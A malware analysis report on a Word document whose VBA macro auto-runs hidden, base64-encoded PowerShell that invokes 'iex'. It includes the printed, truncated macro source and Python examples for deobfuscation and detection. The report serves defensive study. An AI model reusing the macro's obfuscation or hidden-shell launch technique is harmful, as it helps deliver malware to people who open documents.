Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b2924012867d83b6…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 111.8 KB
Created: 2018-05-30 06:25:00
Authoring application: Microsoft Office Word
First seen: 2018-06-19
MD5: 6aea599806a1a31af81be4f2e4120020
SHA-1: 82ad2f8d0ba7e8b617e78506b3ad8008424e6722
SHA-256: b2924012867d83b6b3f04d556a3311255a78ff883e9bc9d8b328bd840fa22b6e
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word document whose VBA project (extracted below as macros.bas) runs when the document is opened. Autoopen() calls jkRFwDRCE(), which returns the concatenation of ten helper names (ASXcIW, XQQiiJWBizI, ...; only the first two are visible in the truncated extract), each of which assembles one slice of the command line from short string fragments. The result is passed to qotwUp(), which prepends Chr(vbKeyP) ("P") and hands it to Shell(..., vbHide), so the process launched is PowersHeLL -WinDowsTyle hidden -e <base64>: a hidden-window PowerShell (-WindowStyle Hidden; parameter names are case-insensitive) running an -EncodedCommand, which is base64 over UTF-16LE. The many Fix()/CDate() statements with undeclared operands are padding that does nothing under On Error Resume Next, and the undeclared names mixed into the Shell() arguments are Empty Variants that contribute nothing to the string. The head of the encoded command decodes to .($ShellId[1]+$ShellId[13]+'X') applied to a -f format string, i.e. Invoke-Expression spelled from characters of $ShellId ("Microsoft.PowerShell"); together with the critical heuristic firings this is consistent with a downloader that fetches and runs a second-stage payload. The extracted source reproduced on this page is truncated inside the second helper, so the full decoded command (and any download URL) cannot be recovered from the preview.
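To check that reading of the macro, the script below re-assembles the first string-builder function, ASXcIW(), from the macros.bas extract on this page and decodes the -e argument. It is an added example, not part of the report or of the sample; the function names (resolve_strings, decode_encoded_command, encode_command, deobfuscate) are mine, and it assumes that an identifier never assigned is an Empty Variant (so it adds nothing under On Error Resume Next) and that the leading "P" comes from Chr(vbKeyP) in qotwUp(). Because the extract stops inside the second builder (XQQiiJWBizI), only the head of the encoded command is recoverable, which is enough to see the `.( $SHElliD[1]+$SheLLid[13]+'X')` construction and the start of the -f format string.

```python
import base64
import re

# Excerpt of the ASXcIW() string-builder from the macros.bas artifact on this
# page. The Fix()/CDate() lines are real padding from the sample, kept so the
# parser can be seen skipping them; the sibling builders (XQQiiJWBizI, ...) are
# cut off in the page's extract, so only the first chain segment is present.
MACRO_EXCERPT = r'''
Function ASXcIW()
On Error Resume Next
rSUhv = Fix(46094 / CSng(78334) * ZqqhBT * jJhdJD)
VhBn = CDate(16973)
DIsovRZI = "owersH" + "eLL -WinDows" + "Tyle hidde" + "n -e IAAuA" + "CgAIAAkAFMASABF" + "AGwAbABpAEQA"
rsHlF = "WwAxAF0AKwAkAF" + "MAaABlAEw" + "ATABpAGQAWwA" + "xADMAXQ" + "ArACcAWAAn" + "ACkAIAA" + "oACgAKA" + "AiAHs" + "ANQA4"
bZEAMcSbH = "AH0AewAxAD" + "cAfQB7ADcANQB9" + "AHsAMQA2AH0Ae" + "wAyADYAfQB7ADMA" + "MQB9AHsAM" + "QAzADcAfQB7" + "ADUAMgB9"
zdhIi = "AHsANQ" + "B9AHsA" + "NwA5AH0AewA5A" + "DIAfQB" + "7ADgAM" + "wB9AHsA" + "NwA4AH0AewAxADI" + "ANwB9AHsAOQA0A" + "H0AewA" + "yADcAfQB7AD"
zosjwJIa = "EAMgA4AH0A" + "ewAxADEANwB9AHs" + "AMQAxADkAfQB7AD" + "QAMgB9AH" + "sAMwA5" + "AH0AewA1A" + "DQAfQB7ADEAMA" + "AyAH0AewAxAD"
zoiwC = "EAfQB7ADE" + "AMwA5AH0AewA4" + "ADgAfQB" + "7ADIAMAB9A" + "HsAMgAzAH0AewAz" + "ADMAfQB7AD"
LdpSJXLDO = "cAfQB7ADMANQB9" + "AHsAOQA5" + "AH0Aew" + "AxADIAM" + "wB9AHsANwAzAH" + "0AewAxADAA" + "MAB9AHsAMQA" + "zADYA" + "fQB7ADg" + "ANQB9AHsANgAyA"
YiZkn = "H0AewA4AH0" + "AewAyADUA" + "fQB7ADUAMwB9" + "AHsAMQAyADEAf" + "QB7ADkAfQB7"
DTsLQ = "ADgAMQB9AHsA" + "MQAxADEAf" + "QB7ADEAMwA4AH0" + "AewA0" + "ADUAfQB7ADYAOAB" + "9AHsANgAwAH0" + "AewAyADg" + "AfQB7A"
ASXcIW = DIsovRZI + rsHlF + bZEAMcSbH + zdhIi + zosjwJIa + zoiwC + LdpSJXLDO + YiZkn + DTsLQ
End Function
'''

# One `name = expr` per line. The expression must be a pure '+' chain of string
# literals and identifiers; anything else (Fix(), CDate(), Shell()) is skipped.
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$', re.M)
TERM = r'"(?:[^"]|"")*"|\w+'
CHAIN_RE = re.compile(rf'\s*(?:{TERM})(?:\s*\+\s*(?:{TERM}))*\s*')
TERM_RE = re.compile(TERM)


def resolve_strings(vba: str) -> dict:
    """Evaluate every string-concatenation assignment in source order.

    VBA identifiers are case-insensitive, and an identifier that was never
    assigned is an Empty Variant, which '+' treats as "" (assumption stated
    in the lead-in; it is how the sample hides real strings among decoy names).
    """
    env = {}
    for name, expr in ASSIGN_RE.findall(vba):
        if not CHAIN_RE.fullmatch(expr):
            continue
        value = ''
        for tok in TERM_RE.findall(expr):
            if tok.startswith('"'):
                value += tok[1:-1].replace('""', '"')   # VBA doubles quotes to escape them
            else:
                value += env.get(tok.lower(), '')
        env[name.lower()] = value
    return env


# -e, -ec, -enc, -encodedcommand; deliberately does not match -ExecutionPolicy.
ENCODED_RE = re.compile(r'-e(?:c|nc?|ncodedcommand)?\s+([A-Za-z0-9+/=]+)', re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Decode PowerShell's -EncodedCommand argument (base64 over UTF-16LE).

    The page's extract is truncated, so the base64 may end mid-quantum and the
    byte stream mid-code-unit; both tails are dropped instead of raising, which
    is the behaviour you want when triaging a partial carve.
    """
    m = ENCODED_RE.search(cmdline)
    if not m:
        raise ValueError('no -EncodedCommand argument found')
    b64 = m.group(1)
    b64 = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]
    return raw.decode('utf-16-le', errors='replace')


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command, used to sanity-check the decoder."""
    return base64.b64encode(script.encode('utf-16-le')).decode('ascii')


def deobfuscate(vba: str, builder: str = 'ASXcIW', prefix: str = 'P') -> tuple:
    """Return (reassembled command line, decoded PowerShell) for one builder.

    `prefix` is the byte the sample supplies outside the builder: qotwUp() puts
    Chr(vbKeyP) = "P" in front of the string before handing it to Shell().
    """
    env = resolve_strings(vba)
    cmdline = prefix + env[builder.lower()]
    return cmdline, decode_encoded_command(cmdline)


if __name__ == '__main__':
    cmd, ps = deobfuscate(MACRO_EXCERPT)
    print(cmd[:70] + '...')
    print(ps)
```

The decoded head reads `.( $SHElliD[1]+$SheLLid[13]+'X') ((("{58}{17}{75}...`: index 1 and 13 of "Microsoft.PowerShell" are "i" and "e", so the call operator is handed the string "ieX", and the quoted part that follows is a PowerShell -f format string whose numbered placeholders are filled from an argument list further into the (truncated) command. The same resolver works on the other builders once a complete extract is available; feed it the full macros.bas and pass builder='jkRFwDRCE' to get the whole command line.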

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6565119-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6565119-0
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (This wording is at odds with the rest of the report: a VBA project was recovered and is extracted below as macros.bas, so treat this finding as overlapping with OLE_VBA_AUTOOPEN rather than as independent evidence.)
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the DrawingML XML namespace that Office writes into embedded drawing parts, not a download or C2 location.
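The three macro heuristics above stack in a simple way: an auto-execution token alone is "high", and the same token next to a shell/download/object-execution token is "critical". The scanner below reproduces that stacking over VBA source and is an added example, not the report's scanner; the token lists, the severity mapping and the names scan_macro and find_tokens are my approximation, and BENIGN_MACRO is a constructed contrast case. Run over the Autoopen/qotwUp excerpt from this sample it fires on `Sub Autoopen()` and `Shell(`, but not on "powershell": the sample splits that word across "owersH" + "eLL" precisely so a token scan of the source never sees it, which is why the report's critical findings rest on the Shell() call plus AutoOpen rather than on a PowerShell string.

```python
import re

# Excerpt of Autoopen()/qotwUp()/ASXcIW() from the macros.bas artifact on this
# page, with the string-builder line shortened to its first fragments.
SAMPLE_MACRO = r'''
Sub Autoopen()
On Error Resume Next
tCbDw = Fix(28181 / CSng(45861) * RoJRV * EuPvC)
qotwUp (jkRFwDRCE)
End Sub
Function qotwUp(rwSfOwlfwP)
On Error Resume Next
tuILZF = icsHTWaDUE + Shell(GRDTbiQ + (Chr(vbKeyP)) + ikISjW + rwSfOwlfwP + pVmqYC, OubqE + vbHide + JniCr)
End Function
Function ASXcIW()
DIsovRZI = "owersH" + "eLL -WinDows" + "Tyle hidde" + "n -e IAAuA"
End Function
'''

# Constructed contrast case: auto-executes but never spawns anything.
BENIGN_MACRO = r'''
Sub AutoOpen()
    ActiveDocument.Sections(1).Headers(1).Range.Text = "DRAFT"
End Sub
'''

# My approximation of the token classes behind OLE_VBA_AUTOOPEN, OLE_VBA_SHELL
# and OLE_VBA_PCODE_AUTOEXEC_EXEC; not the report's actual rule set.
AUTOEXEC_TOKENS = ('AutoOpen', 'AutoExec', 'AutoClose', 'Auto_Open',
                   'Document_Open', 'Workbook_Open')
EXEC_TOKENS = ('Shell', 'WScript.Shell', 'ShellExecute', 'CreateObject',
               'powershell', 'cmd.exe')
DOWNLOAD_TOKENS = ('URLDownloadToFile', 'XMLHTTP', 'WinHttpRequest',
                   'Net.WebClient', 'DownloadString', 'DownloadFile')


def find_tokens(src: str, tokens) -> set:
    """Whole-token, case-insensitive matches (VBA identifiers are case-insensitive).

    The lookbehind rejects a token that is only the tail of a dotted name, so a
    bare 'Shell' hit means the Shell() function, not WScript.Shell.
    """
    hits = set()
    for tok in tokens:
        if re.search(r'(?<![\w.])' + re.escape(tok) + r'(?![\w])', src, re.I):
            hits.add(tok)
    return hits


def scan_macro(src: str) -> dict:
    """Stack the findings the way the report does."""
    autoexec = find_tokens(src, AUTOEXEC_TOKENS)
    execs = find_tokens(src, EXEC_TOKENS)
    downloads = find_tokens(src, DOWNLOAD_TOKENS)
    if autoexec and (execs or downloads):
        severity = 'critical'      # auto-exec + execution/download token
    elif autoexec:
        severity = 'high'          # auto-exec alone
    elif execs or downloads:
        severity = 'medium'        # execution token with no auto-exec trigger
    else:
        severity = 'info'
    return {'autoexec': autoexec, 'exec': execs,
            'download': downloads, 'severity': severity}


if __name__ == '__main__':
    for label, src in (('sample', SAMPLE_MACRO), ('benign', BENIGN_MACRO)):
        print(label, scan_macro(src))
```

Note what the scanner does not see: no download token fires on the sample, because the download logic lives inside the base64 PowerShell, not in the VBA. That is the normal shape of this kind of document and is why a source-level token scan is only the first tier; the Shell() call with a hidden window is the signal that forces decoding of the argument.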

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15249 bytes
SHA-256: 3804d9e15d35526646ff91a0921bd83680404c694fb5f6fa0d9ab60ec3ce19ac

Script preview (first 1,000 lines of the extracted script; the copy reproduced here is cut off partway through the second string-builder function, so the complete command line cannot be rebuilt from it):
Attribute VB_Name = "bpQVuMdM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function jkRFwDRCE()
On Error Resume Next
sTiBfz = Fix(94964 / CSng(4060) * GWoqOC * vTSSrF)
VhBn = CDate(48905)
lvlHc = Fix(9177 / CSng(69661) * zaVAWs * Duiok)
VhBn = CDate(90467)
jkRFwDRCE = ASXcIW + XQQiiJWBizI + lUuws + CEwBjUiXk + EVkCGvaYb + nLaVXLNkj + wqjzIazSPPU + qhwTvwoYT + OiSwlsVTp + ijlznuK
adCho = Fix(77451 / CSng(45319) * wnuiP * OqZrVv)
VhBn = CDate(77263)
End Function
Sub Autoopen()
On Error Resume Next
tCbDw = Fix(28181 / CSng(45861) * RoJRV * EuPvC)
VhBn = CDate(98244)
qotwUp (jkRFwDRCE)
iGsckp = Fix(8376 / CSng(15727) * OzjJkz * lpIdp)
VhBn = CDate(42353)
End Sub
Function qotwUp(rwSfOwlfwP)
On Error Resume Next
VzOGl = Fix(60624 / CSng(53559) * spoLw * aOYTAU)
VhBn = CDate(50662)
tuILZF = icsHTWaDUE + Shell(GRDTbiQ + (Chr(vbKeyP)) + ikISjW + rwSfOwlfwP + pVmqYC, OubqE + vbHide + JniCr)
lLWEn = Fix(57971 / CSng(12732) * WmMAXi * jScUo)
VhBn = CDate(13095)
End Function


Attribute VB_Name = "UZDXLbkJoBiLM"
Function ASXcIW()
On Error Resume Next
rSUhv = Fix(46094 / CSng(78334) * ZqqhBT * jJhdJD)
VhBn = CDate(16973)
DIsovRZI = "owersH" + "eLL -WinDows" + "Tyle hidde" + "n -e IAAuA" + "CgAIAAkAFMASABF" + "AGwAbABpAEQA"
lzjiuX = Fix(97832 / CSng(71393) * ztPPE * LWOVi)
VhBn = CDate(56439)
rsHlF = "WwAxAF0AKwAkAF" + "MAaABlAEw" + "ATABpAGQAWwA" + "xADMAXQ" + "ArACcAWAAn" + "ACkAIAA" + "oACgAKA" + "AiAHs" + "ANQA4"
IEXMr = Fix(10126 / CSng(70435) * FKjUih * tuGaF)
VhBn = CDate(45424)
bZEAMcSbH = "AH0AewAxAD" + "cAfQB7ADcANQB9" + "AHsAMQA2AH0Ae" + "wAyADYAfQB7ADMA" + "MQB9AHsAM" + "QAzADcAfQB7" + "ADUAMgB9"
HDifpV = Fix(14930 / CSng(90539) * iUOrfH * ftAfuj)
VhBn = CDate(61920)
zdhIi = "AHsANQ" + "B9AHsA" + "NwA5AH0AewA5A" + "DIAfQB" + "7ADgAM" + "wB9AHsA" + "NwA4AH0AewAxADI" + "ANwB9AHsAOQA0A" + "H0AewA" + "yADcAfQB7AD"
VmAcTP = Fix(8789 / CSng(45415) * awTiM * PfKcF)
VhBn = CDate(99163)
zosjwJIa = "EAMgA4AH0A" + "ewAxADEANwB9AHs" + "AMQAxADkAfQB7AD" + "QAMgB9AH" + "sAMwA5" + "AH0AewA1A" + "DQAfQB7ADEAMA" + "AyAH0AewAxAD"
qflNa = Fix(62752 / CSng(10073) * nYXjJD * ibSZz)
VhBn = CDate(26911)
zoiwC = "EAfQB7ADE" + "AMwA5AH0AewA4" + "ADgAfQB" + "7ADIAMAB9A" + "HsAMgAzAH0AewAz" + "ADMAfQB7AD"
jnzTd = Fix(72012 / CSng(663) * GbvAvU * GoXSIm)
VhBn = CDate(46264)
LdpSJXLDO = "cAfQB7ADMANQB9" + "AHsAOQA5" + "AH0Aew" + "AxADIAM" + "wB9AHsANwAzAH" + "0AewAxADAA" + "MAB9AHsAMQA" + "zADYA" + "fQB7ADg" + "ANQB9AHsANgAyA"
wDMtAj = Fix(19662 / CSng(60860) * GawwO * DTrER)
VhBn = CDate(93323)
YiZkn = "H0AewA4AH0" + "AewAyADUA" + "fQB7ADUAMwB9" + "AHsAMQAyADEAf" + "QB7ADkAfQB7"
IHBoVd = Fix(2913 / CSng(59001) * dLrBQ * rzAwv)
VhBn = CDate(86106)
DTsLQ = "ADgAMQB9AHsA" + "MQAxADEAf" + "QB7ADEAMwA4AH0" + "AewA0" + "ADUAfQB7ADYAOAB" + "9AHsANgAwAH0" + "AewAyADg" + "AfQB7A"
ASXcIW = DIsovRZI + rsHlF + bZEAMcSbH + zdhIi + zosjwJIa + zoiwC + LdpSJXLDO + YiZkn + DTsLQ
End Function
Function XQQiiJWBizI()
On Error Resume Next
VXsrhU = Fix(97287 / CSng(32086) * GzJuFs * NjiXB)
VhBn = CDate(92418)
FuOSjiTPwL = "DcANgB9AHsAN" + "gA0AH0Aew" + "A3ADQAfQB" + "7ADgA" + "MAB9AHsA" + "MQAwA" + "DEAfQB7ADYANQB" + "9AHsA"
HNqmbr = Fix(6947 / CSng(40662) * vOmdv * wjjpvE)
VhBn = CDate(84318)
drkiB = "OQAzAH0AewAw" + "AH0Aew" + "A2ADYAfQ" + "B7ADEAMA" + "A4AH0AewA1ADc" + "AfQB7"
VLznmP = Fix(33315 / CSng(40288) * Zmliqi * ZflwN)
VhBn = CDate(60206)
nkjpkWvZcRw = "ADkAOAB9AHsA" + "MwA2A" + "H0AewA2AH0Ae" + "wAyADEAfQB7ADUA" + "NQB9AHsAM"
OQkkz = Fix(84111 / CSng(23033) * jPVUb * EQFjaW)
VhBn = CDate(25652)
ZdsjSDBSSJi = "QA4AH0AewA1A" + "DAAfQ" + "B7ADQAfQB7ADEA" + "MQA2AH0AewAxA" + "DEAMwB9AHsANg"
KzFwJQ = Fix(31196 / CSng(37648) * iqslXC * TdjYFW)
VhBn = CDate(17318)
OiTWMtRJid = "A5AH0AewA4ADYAf" + "QB7ADk" + "ANQB9AHsANwA3" + "AH0AewA5" + "ADcAfQB7A" + "DEAMwAzAH0"
HuVOj = Fix(28350 / CSng(74
... (truncated)